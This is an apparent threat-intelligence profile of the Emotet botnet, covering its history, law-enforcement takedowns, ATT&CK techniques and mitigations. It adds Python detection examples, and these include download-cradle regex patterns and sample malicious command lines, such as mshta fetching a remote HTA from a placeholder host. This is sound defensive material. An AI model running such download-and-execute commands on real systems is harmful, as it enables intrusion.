Emotet
Once designated by Europol as "the world's most dangerous malware," Emotet is a modular banking trojan that evolved into one of the largest and most professional malware-as-a-service (MaaS) and infrastructure-as-a-service (IaaS) botnets in cybercrime history. Active since 2014, Emotet infected over 1.6 million computers globally, generated an estimated $2 billion+ in damages, and served as a primary delivery mechanism for TrickBot, QakBot, IcedID, and Ryuk ransomware. Despite being disrupted twice by international law enforcement, Emotet has been dormant since April 2023, and its mastermind — known only as "Odd" — remains at large.
Overview
Emotet first appeared in June 2014 as a banking trojan that stole financial credentials by monitoring raw network traffic directed at financial institutions. Over the following decade, it evolved into one of the cybercrime ecosystem's central infrastructure providers, offering Malware-as-a-Service (MaaS) and Infrastructure-as-a-Service (IaaS) to other criminal groups. At its peak, Emotet was responsible for an estimated one in five malware infections worldwide, renting access to its vast network of compromised machines to ransomware operators, banking trojan developers, and other threat actors.
The operation is attributed to a cybercriminal group tracked as TA542 (Proofpoint), Mummy Spider (CrowdStrike), Mealybug (ESET), or GOLD CABIN (Secureworks), believed to be based in Ukraine or Eastern Europe. The group's leader, known only by the codename "Odd" (and multiple other aliases including Aron, C700, Cbd748, Ivanov Odd, Mors, Morse, and Veron), has never been identified despite two major law enforcement takedowns and remains actively sought by Europol's Operation Endgame. In May 2024, Operation Endgame published a video calling for public information about Odd's identity, co-conspirators, and current activities.
Emotet's operational rhythm was distinctive: cycles of 2-3 months of aggressive spam campaigns followed by 3-12 months of dormancy used to update capabilities, refresh infrastructure, and evade detection. This pattern of disappearance and resurgence made Emotet one of the most resilient threats in the landscape. The group has been declared dead multiple times, only to return with enhanced capabilities. However, the current dormancy period since April 2023 is the longest without confirmed new activity, and the combination of Microsoft's VBA macro restrictions and sustained law enforcement pressure may have finally disrupted the operation's core business model.
No credible Emotet activity has been observed since April 2023. However, Emotet has resurrected itself before after extended dormancy, and the mastermind "Odd" remains at large. Operation Endgame's public appeal for information (May 2024) and its "Season 2" takedown of related botnet infrastructure (May 2025) suggest law enforcement believes the operators may still be active in other capacities. Organizations should not remove Emotet detection rules and should maintain awareness of potential future resurgence.
Timeline of Disruptions & Resurgences
- January 2021 — Operation Ladybird: An international coalition of eight countries coordinated by Eurojust and Europol seized Emotet's infrastructure. German BKA pushed an uninstaller module to infected devices. Ukrainian police arrested individuals responsible for the infrastructure. At the time of takedown, over 1.6 million computers were infected globally.
- November 2021 — First Resurgence: Ten months after the takedown, TrickBot was observed downloading and executing updated Emotet binaries onto previously infected systems. The botnet rebuilt on two new botnets (Epoch 4 and Epoch 5) with upgraded encryption (ECC instead of RSA) and control-flow flattening for code obfuscation.
- July 2022 — Microsoft Macro Restrictions: Microsoft's default disabling of VBA macros in Office documents downloaded from the internet eliminated Emotet's primary infection vector. The group struggled to adapt, experimenting with LNK files, XLL files, and OneNote attachments with diminishing success.
- March 2023 — Final Observed Campaign: Three small, distinct malspam campaigns tested different intrusion techniques (VBA macros, OneNote attachments, inflated document files). Each campaign was brief and appeared to reflect dissatisfaction with results.
- April 2023 — Dormancy Begins: No confirmed Emotet spam activity has been observed since early April 2023. ESET assessed the botnet was "silent and inactive, most probably due to failing to find an effective new attack vector."
- May 2024 — Operation Endgame (Season 1): International law enforcement disrupted dropper botnet infrastructure supporting IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and TrickBot. Europol issued a public call for information about Emotet's mastermind "Odd."
- May 2025 — Operation Endgame (Season 2): Continued takedown of related botnet infrastructure. Spamhaus coordinated credential remediation for compromised accounts used in botnet operations.
Botnet Architecture: Epochs
Security researchers tracked Emotet's infrastructure through "epoch" designations. The original botnet operated on three separate botnets (Epoch 1, 2, 3) by September 2019. After the November 2021 resurgence, the rebuilt infrastructure ran on Epoch 4 and Epoch 5. Each epoch maintained independent C2 infrastructure, enabling resilience against partial takedowns. Emotet frequently rotated IP addresses and TCP ports for C2 communications, sometimes using dozens of different malware-hosting URLs per day. The Cryptolaemus research group provided ongoing public tracking of Emotet epoch activity throughout its operational periods.
Target Profile
Emotet was indiscriminate in its targeting, infecting systems belonging to individuals, small businesses, and large organizations alike. Specific sectors were targeted based on financial value and the downstream access they could provide to Emotet's criminal clients.
- Financial Services: Emotet's original purpose was banking credential theft. Financial institutions remained a primary target throughout its operational history, providing both direct financial returns and high-value credentials for further exploitation.
- Government (State & Local): CISA issued a dedicated alert in 2020 warning of a significant increase in Emotet targeting of state and local governments. The agency's intrusion detection system recorded approximately 16,000 Emotet-related alerts since July 2020. CISA estimated remediation costs of $1 million per incident for government agencies.
- Healthcare: A significant target during the COVID-19 pandemic period. Emotet delivered ransomware payloads (including Ryuk) to healthcare organizations, causing severe operational disruptions. HHS HC3 issued multiple threat advisories specifically addressing Emotet's impact on the health sector.
- Education: Universities and school systems were frequently targeted, with Emotet using their compromised infrastructure to distribute further spam. The education sector's typically less mature security posture made it a productive infection environment.
- Manufacturing & Technology: Emotet infections in manufacturing and technology organizations provided high-value access for ransomware operators like Ryuk and Conti, where operational downtime translates to significant financial pressure.
Geographically, Emotet campaigns were truly global, hitting targets across North America, Europe, Asia-Pacific, and beyond. Spam campaigns used multiple languages including English, French, Russian, Italian, Spanish, Chinese, Slovenian, Hungarian, Polish, and Norwegian to maximize reach. At peak volume, a single infected host could send 12+ emails per minute, meaning hundreds of active bots generated hundreds of thousands of malicious emails daily.
Tactics, Techniques & Procedures
Emotet's TTPs evolved significantly over its decade of operation, adapting to defensive improvements and operational setbacks. The following reflects the group's capabilities across its full operational history.
| MITRE ID | Technique | Description |
|---|---|---|
| T1566.001 | Spearphishing Attachment | Primary infection vector. Delivered malicious Word, Excel, OneNote, and ZIP attachments via massive spam campaigns. Used thread hijacking (replying to stolen legitimate email chains) to increase credibility. At peak, generated hundreds of thousands of emails per day. |
| T1566.002 | Spearphishing Link | Emails containing links to malicious files hosted on compromised or attacker-controlled infrastructure. Used OneDrive URLs hosting ZIP files containing XLL files in later campaigns. URLs rotated frequently, sometimes dozens per day. |
| T1059.005 | Visual Basic | VBA macros in Office documents were Emotet's most effective infection vector from 2014-2022. Microsoft's July 2022 default disabling of VBA macros in internet-sourced documents effectively killed this vector. Later campaigns used social engineering to trick victims into copying files to whitelisted "Templates" folders to bypass the restriction. |
| T1027 | Obfuscated Files or Information | Hashbusting generates unique file hashes for each infection. Control-flow flattening obfuscates code execution paths. Inflated file sizes (500MB+) used to evade antivirus scanning limitations. Emotet DLLs padded beyond scanner file size limits. |
| T1218 | System Binary Proxy Execution | Uses legitimate Windows utilities (mshta.exe, regsvr32.exe, rundll32.exe) to execute malicious payloads, exploiting trust in signed Microsoft binaries (living-off-the-land). |
| T1547.001 | Registry Run Keys / Startup Folder | Creates registry run keys and Windows services for persistence across system reboots. Maintains multiple persistence mechanisms to survive partial remediation. |
| T1110 | Brute Force | Brute-forces passwords using built-in password lists to spread laterally across networks. Writes to SMB shared drives on compromised networks to infect additional machines without requiring user interaction. |
| T1114.001 | Local Email Collection | Harvests email contacts and message content from infected machines' email clients. Stolen emails are used to fuel thread-hijacking spam campaigns, making Emotet phishing appear as replies to legitimate conversations. This technique produced one of the largest-scale spearphishing operations ever observed. |
| T1104 | Multi-Stage Channels | Modular architecture uses initial Emotet infection as a staging platform for secondary payloads. Delivered TrickBot, QakBot, IcedID, Cobalt Strike beacons, and ransomware (Ryuk, Conti, Quantum, ALPHV/BlackCat) to infected machines on behalf of criminal clients. |
| T1573 | Encrypted Channel | C2 communications encrypted using elliptic curve cryptography (ECC, post-2021 resurgence) replacing earlier RSA encryption. HTTPS with self-signed certificates. Google's ProtoBuf protocol used for C2 message formatting. |
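The "inflated file" trick in the T1027 row is cheap to measure at a gateway or in a sandbox, because the padding is appended as a run of one repeated byte after an otherwise small document. The following is an added example, not code from the original page or from any of the vendors it cites. It assumes the attachment is an OOXML document (a ZIP archive, so the end-of-central-directory record marks where the real file ends); the sample document is constructed in memory with `zipfile`, the 500 MB threshold is the figure quoted on the page, and the demo call lowers it so the check can be run on a small sample.

```python
"""Measure whether an Office attachment has been inflated with padding.

Added example (not from the original page). Two cheap measurements:
  1. the fraction of the file occupied by a run of one repeated byte at
     the end (Emotet padded documents and DLLs with filler bytes), and
  2. for OOXML documents (ZIP archives) the number of bytes that sit
     after the end-of-central-directory (EOCD) record, where a normal
     file carries at most a short archive comment.
"""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"                      # ZIP end-of-central-directory signature
EOCD_FIXED_LEN = 22                           # fixed part of the EOCD record, before the comment
DEFAULT_SIZE_THRESHOLD = 500 * 1024 * 1024    # 500 MB, the figure quoted on the page


def trailing_run_fraction(data: bytes) -> float:
    """Fraction of the file taken up by a run of one repeated byte at the end."""
    if not data:
        return 0.0
    stripped = data.rstrip(data[-1:])   # rstrip runs in C, so this is fine on large files
    return (len(data) - len(stripped)) / len(data)


def bytes_after_zip_end(data: bytes):
    """Bytes appended after the EOCD record and its comment; None if not a ZIP."""
    pos = data.rfind(EOCD_SIG)
    if pos < 0 or pos + EOCD_FIXED_LEN > len(data):
        return None
    comment_len = struct.unpack_from("<H", data, pos + 20)[0]
    return len(data) - (pos + EOCD_FIXED_LEN + comment_len)


def assess_inflation(data: bytes, size_threshold: int = DEFAULT_SIZE_THRESHOLD) -> dict:
    """Return the measurements plus a verdict; size alone is not enough to flag."""
    size = len(data)
    run = trailing_run_fraction(data)
    tail = bytes_after_zip_end(data)
    padded = run > 0.9 or (tail is not None and tail > size * 0.9)
    return {
        "size": size,
        "trailing_run_fraction": round(run, 3),
        "bytes_after_zip_end": tail,
        "suspicious": size >= size_threshold and padded,
    }


def build_padded_sample(pad_bytes: int) -> bytes:
    """Constructed sample: a minimal OOXML-like ZIP followed by null padding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue() + b"\x00" * pad_bytes


if __name__ == "__main__":
    # 2 MB of padding and a 1 MB threshold stand in for the 500 MB real-world case.
    sample = build_padded_sample(2 * 1024 * 1024)
    print(assess_inflation(sample, size_threshold=1024 * 1024))
```

Because the verdict requires both the size threshold and padding evidence, a legitimately large document full of images is not flagged, while a tiny document inflated with filler is.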
Known Campaigns
Emotet's campaigns are defined by their enormous scale and cyclical pattern of aggressive spamming followed by extended dormancy.
Emotet began as a banking trojan targeting financial institutions. It evolved through multiple versions (V1-V4), adding capabilities including worm-like propagation, third-party malware delivery, and modular architecture. By 2017, it began delivering malware payloads for other criminal groups, transitioning from direct theft to infrastructure-as-a-service.
Emotet became a primary delivery mechanism for TrickBot banking trojan and, subsequently, Ryuk ransomware. This "triple threat" infection chain (Emotet → TrickBot → Ryuk) was responsible for some of the most damaging ransomware attacks against healthcare, education, and government organizations during this period. At peak, Emotet controlled infrastructure across three botnets (Epoch 1, 2, 3) and infected over 1.6 million computers.
CISA issued an alert warning of a significant increase in Emotet targeting of state and local governments after resurfacing from a five-month dormancy. CISA's intrusion detection system recorded approximately 16,000 Emotet alerts. The 2018 U.S. DHS alert had previously estimated remediation costs of $1 million per incident. Emotet became one of the most prevalent ongoing threats during this period.
International law enforcement coalition from eight countries (Netherlands, Germany, U.S., U.K., France, Lithuania, Canada, Ukraine) seized Emotet's infrastructure. German BKA pushed an uninstaller module to infected devices, scheduled for mass removal on April 25, 2021. Ukrainian police arrested individuals responsible for infrastructure maintenance. At the time, Emotet had infected over 1.6 million computers globally, and remediation had cost U.S. organizations alone over $45,000 per computer.
Emotet resurrected ten months after takedown, rebuilt via TrickBot infrastructure. New botnets (Epoch 4, Epoch 5) featured upgraded ECC encryption, control-flow flattening obfuscation, and HTTPS with self-signed certificates. Reached over 50% of pre-takedown volume within weeks. Kaspersky recorded a 200% activity increase in March 2022 alone, with 30,000 malicious emails in a single month. Check Point ranked Emotet as the most prevalent malware globally during this period. Microsoft's July 2022 VBA macro restrictions caused a sharp decline.
Brief, experimental campaigns testing alternative infection vectors after macro restrictions: XLS documents with macros (November 2022, two weeks only), VBA macro documents with social engineering to bypass Protected View (March 2023), OneNote attachments, and inflated document files exceeding 500MB. Each campaign was smaller than the last, suggesting the operators struggled to find an effective replacement for their VBA macro attack vector. No confirmed activity since early April 2023.
Tools & Malware
Emotet's modular architecture supported a wide range of capabilities through loadable modules and delivered third-party payloads.
- Emotet Core (Loader/Downloader): The primary infection payload. Modular DLL-based architecture supporting hot-swappable modules. Uses hashbusting to generate unique file hashes per infection. Registered as a Windows service for persistence. Post-2021 versions use ECC encryption, control-flow flattening, and Google ProtoBuf for C2 communications.
- Spammer Module: Transforms infected machines into spam bots, sending 12+ emails per minute from compromised accounts. Uses stolen email content and contact lists for thread-hijacking campaigns. Considered by Mealybug to be a "precious" module deployed only on machines deemed safe.
- Email Harvester Module: Extracts email contacts, message bodies, and credentials from infected machines' email clients. Fuels the thread-hijacking spam pipeline that made Emotet's phishing unusually effective.
- Credential Stealer Module: Harvests usernames and passwords from web browsers, email clients, and other applications. Stolen credentials sold to other criminal groups or used for lateral movement.
- Network Spreader / SMB Module: Propagates across internal networks by writing to SMB file shares and brute-forcing passwords using built-in password lists. Enables worm-like behavior within compromised environments.
- StealBit-style Exfiltration: Captures network traffic and exfiltrates system information including computer name, locale, OS version, and running processes to C2 infrastructure.
Third-Party Payloads Delivered via Emotet
- TrickBot: Banking trojan that became Emotet's most significant payload partner. TrickBot later assisted Emotet's November 2021 resurgence by distributing updated Emotet binaries.
- QakBot (Qbot): Banking trojan and backdoor delivered to Emotet-infected machines. Also uses thread-hijacking techniques similar to Emotet's own campaigns.
- IcedID: Banking trojan/loader delivered as a secondary payload in post-resurgence campaigns (2022).
- Cobalt Strike: Commercial adversary simulation tool delivered for post-exploitation and lateral movement, enabling more hands-on ransomware deployment.
- Ryuk / Conti / Quantum / ALPHV (BlackCat): Ransomware families delivered to Emotet-infected networks. The Emotet → TrickBot → Ryuk chain was particularly devastating to healthcare and government organizations.
- Bumblebee: Malware loader observed being delivered via Emotet in late 2022 campaigns, serving as an alternative initial access mechanism for ransomware operators.
Indicators of Compromise
Emotet generates enormous volumes of IOCs due to hashbusting, daily URL rotation, and frequent C2 infrastructure changes. Static IOC lists have extremely limited shelf life.
Emotet's hashbusting technique produces unique file hashes for every infection. C2 IP addresses and malware-hosting URLs change daily or more frequently. Static IOC lists become stale within hours. For real-time Emotet tracking, use the abuse.ch Emotet trackers (Feodo Tracker for C2 servers, URLhaus for malware URLs, MalwareBazaar for samples) and the Cryptolaemus community research group's public feeds.
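Consuming a tracker feed only helps if stale entries are aged out as fast as Emotet rotated them. The following is an added example, not code from the original page or from abuse.ch. It assumes the column layout of the Feodo Tracker IP blocklist CSV (first_seen_utc, dst_ip, dst_port, c2_status, last_online, malware); the feed lines are constructed samples using documentation and private address ranges, not real indicators, and the reference date is passed in rather than taken from the clock so the result is reproducible.

```python
"""Build a short-lived Emotet C2 blocklist from a Feodo Tracker style feed.

Added example (not from the page or abuse.ch). The freshness rule is the
point: an entry is kept only if it is flagged online or was last seen
within MAX_AGE_DAYS of the reference date, because Emotet C2 addresses
changed daily and older entries only add noise to a blocklist.
"""
import csv
from datetime import date, datetime

MAX_AGE_DAYS = 7

# Constructed sample feed (RFC 5737 documentation addresses, not real C2 servers).
SAMPLE_FEED = """\
# Feodo Tracker botnet C2 IP blocklist (constructed sample, assumed column layout)
# first_seen_utc,dst_ip,dst_port,c2_status,last_online,malware
2023-03-20 08:15:00,192.0.2.10,8080,online,2023-03-29,Emotet
2023-03-01 11:00:00,198.51.100.7,443,offline,2023-03-25,Emotet
2022-11-02 14:30:00,203.0.113.5,7080,offline,2022-12-01,Emotet
2023-03-27 02:00:00,192.0.2.44,443,online,2023-03-29,QakBot
2023-03-28 09:45:00,198.51.100.200,443,offline,2023-03-28,Emotet
"""

FIELDS = ["first_seen_utc", "dst_ip", "dst_port", "c2_status", "last_online", "malware"]


def parse_feed(text: str) -> list[dict]:
    """Parse the feed, skipping comment lines; one dict per well-formed row."""
    rows = [line for line in text.splitlines() if line and not line.startswith("#")]
    return [dict(zip(FIELDS, r)) for r in csv.reader(rows) if len(r) == len(FIELDS)]


def is_fresh(row: dict, today: date, max_age_days: int = MAX_AGE_DAYS) -> bool:
    """Online entries are always kept; offline ones only if seen recently."""
    if row["c2_status"].lower() == "online":
        return True
    last = datetime.strptime(row["last_online"], "%Y-%m-%d").date()
    return (today - last).days <= max_age_days


def emotet_blocklist(text: str, today: date, max_age_days: int = MAX_AGE_DAYS) -> list[str]:
    """Sorted 'ip:port' strings for fresh entries tagged Emotet only."""
    return sorted(
        f'{row["dst_ip"]}:{row["dst_port"]}'
        for row in parse_feed(text)
        if row["malware"].lower() == "emotet" and is_fresh(row, today, max_age_days)
    )


if __name__ == "__main__":
    for entry in emotet_blocklist(SAMPLE_FEED, date(2023, 3, 29)):
        print(entry)
```

Re-running the same function a couple of weeks later drops the offline entries automatically, which is the behaviour a static IOC list cannot give you.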
Mitigation & Defense
Recommended defensive measures based on CISA Alert AA20-280A, Europol advisories, and threat intelligence community guidance. While Emotet is currently dormant, these mitigations protect against its historical TTPs and similar threats.
- Enforce macro restrictions in Microsoft Office: Microsoft's default disabling of VBA macros in internet-sourced documents was the single most effective defense against Emotet. Ensure this policy is enforced organization-wide via Group Policy. Block XLL file types and restrict OneNote embedded file execution where possible.
- Block common malware-associated file types at the email gateway: Filter .dll, .exe, .scr, .hta, .vbs, .js, .lnk, and .xll attachments. Block or quarantine password-protected ZIP archives that cannot be scanned. Implement size-based filtering to catch inflated documents (500MB+) designed to evade AV scanners.
- Implement email authentication (DMARC, DKIM, SPF): Emotet's thread-hijacking campaigns spoof legitimate senders using harvested email content. Strict email authentication helps identify spoofed messages. Configure DMARC with reject policies and monitor for failures.
- Deploy robust endpoint detection and response (EDR): Monitor for Emotet's living-off-the-land techniques: regsvr32.exe and rundll32.exe loading DLLs from unusual directories, mshta.exe executing remote HTA files, and PowerShell-based download cradles. Behavioral detection is essential given hashbusting makes signature-based detection unreliable.
- Restrict lateral movement: Emotet spreads via SMB shares and brute-forced passwords. Segment networks to limit SMB access between workstations, enforce strong password policies, implement account lockout mechanisms, and restrict administrative shares.
- Maintain patched and current systems: While Emotet primarily relied on social engineering for initial access, its downstream payloads (TrickBot, Ryuk, Conti) often exploit unpatched vulnerabilities for lateral movement and privilege escalation.
- Subscribe to real-time Emotet tracking feeds: Static IOC lists are ineffective against Emotet's daily rotation of indicators. Use the abuse.ch Feodo Tracker, URLhaus, and MalwareBazaar for real-time C2, URL, and sample tracking. Follow the Cryptolaemus community research group for public epoch tracking and campaign analysis.
- Treat Emotet infections as precursors to ransomware: An Emotet infection, or even an infection attempt, is one of the strongest early indicators of a future ransomware attack. Prioritize rapid detection and containment of any Emotet-related activity to prevent downstream payload delivery.
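The living-off-the-land chain in the T1218 and T1059.005 rows, and the EDR monitoring bullet above, translate directly into behavioural rules. The following is an added example, not code from the original page or from any vendor, and it goes slightly beyond the bullet by also covering an Office parent spawning a script host. It assumes process-creation events already normalised to dicts with `id`, `parent`, `image` and `cmdline` keys (Sysmon Event ID 1 style); the events are constructed samples and `example.invalid` is a placeholder host.

```python
"""Behavioural detections for the Emotet execution chain.

Added example (not from the page or any vendor). Each rule is a plain
function over one normalised process-creation event so the logic reads
like the SIEM rule it would become:
  - Office application spawning a script host or proxy binary
  - regsvr32/rundll32 loading a DLL from a user-writable directory
  - mshta.exe pointed at a remote HTA
  - PowerShell download cradle or encoded command
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "onenote.exe", "outlook.exe"}
PROXY_BINARIES = {"regsvr32.exe", "rundll32.exe", "mshta.exe"}
SCRIPT_HOSTS = PROXY_BINARIES | {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\", "\\programdata\\")
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\s-enc(odedcommand)?\s",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cmdline_tokens(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths as one token."""
    return [a or b for a, b in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def rule_office_spawns_script_host(ev: dict) -> bool:
    """Office document spawning a script host or proxy binary (macro / OneNote chain)."""
    return basename(ev["parent"]) in OFFICE_APPS and basename(ev["image"]) in SCRIPT_HOSTS


def rule_dll_from_user_writable_path(ev: dict) -> bool:
    """regsvr32/rundll32 given a DLL argument that lives in a user-writable directory."""
    if basename(ev["image"]) not in {"regsvr32.exe", "rundll32.exe"}:
        return False
    return any(
        any(marker in tok.lower() for marker in USER_WRITABLE)
        for tok in cmdline_tokens(ev["cmdline"])[1:]
    )


def rule_mshta_remote(ev: dict) -> bool:
    """mshta.exe executing an HTA fetched over HTTP(S)."""
    return basename(ev["image"]) == "mshta.exe" and re.search(r"https?://", ev["cmdline"], re.I) is not None


def rule_powershell_cradle(ev: dict) -> bool:
    """PowerShell download cradle or encoded command line."""
    return basename(ev["image"]) == "powershell.exe" and DOWNLOAD_CRADLE.search(ev["cmdline"]) is not None


RULES = {
    "office_spawns_script_host": rule_office_spawns_script_host,
    "dll_from_user_writable_path": rule_dll_from_user_writable_path,
    "mshta_remote_hta": rule_mshta_remote,
    "powershell_download_cradle": rule_powershell_cradle,
}


def evaluate(events: list[dict]) -> list[tuple[str, str]]:
    """Return (event_id, rule_name) for every rule that fires, in event order."""
    return [(ev["id"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample events: two Emotet-like chains (e1, e2) and two benign ones (e3, e4).
SAMPLE_EVENTS = [
    {"id": "e1", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Users\jdoe\AppData\Local\Temp\oxm.dll"'},
    {"id": "e2", "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://example.invalid/stage.hta"},   # placeholder host
    {"id": "e3", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"'},
    {"id": "e4", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Date"},
]


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

None of these rules depends on a file hash, which is why they keep working across hashbusting; the benign events e3 and e4 show that the same binaries used from vendor directories or without a download cradle do not fire.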
Emotet's greatest legacy may be the ecosystem it helped build. By providing reliable, scalable initial access to criminal clients, Emotet enabled the ransomware-as-a-service economy that continues to thrive today. Even in dormancy, the TTPs Emotet pioneered — thread hijacking, hashbusting, modular payload delivery, and infrastructure-as-a-service — have been adopted by successor operations including QakBot, Bumblebee, and PikaBot. Defending against these successors requires the same mitigations that were effective against Emotet itself. Emotet's mastermind "Odd" remains unidentified and potentially active in other operations; a resurgence cannot be ruled out.
Sources & Further Reading
Attribution and references used to build this profile.
- Europol — World's Most Dangerous Malware EMOTET Disrupted Through Global Action (2021)
- MITRE ATT&CK — Emotet (S0367)
- ESET — What's Up With Emotet? (2023)
- Palo Alto Unit 42 — Emotet Summary: November 2021 Through January 2022
- The Hacker News — Authorities Ramp Up Efforts to Capture the Mastermind Behind Emotet (2024)
- Spamhaus — Operation Endgame: Botnets Disrupted After International Action (2025)
- HHS HC3 — Emotet: The Enduring and Persistent Threat to the Health Sector
- Huntress — Emotet Malware: Analysis, Detection, Removal
- Cisco Talos — Emotet Coming in Hot (2022)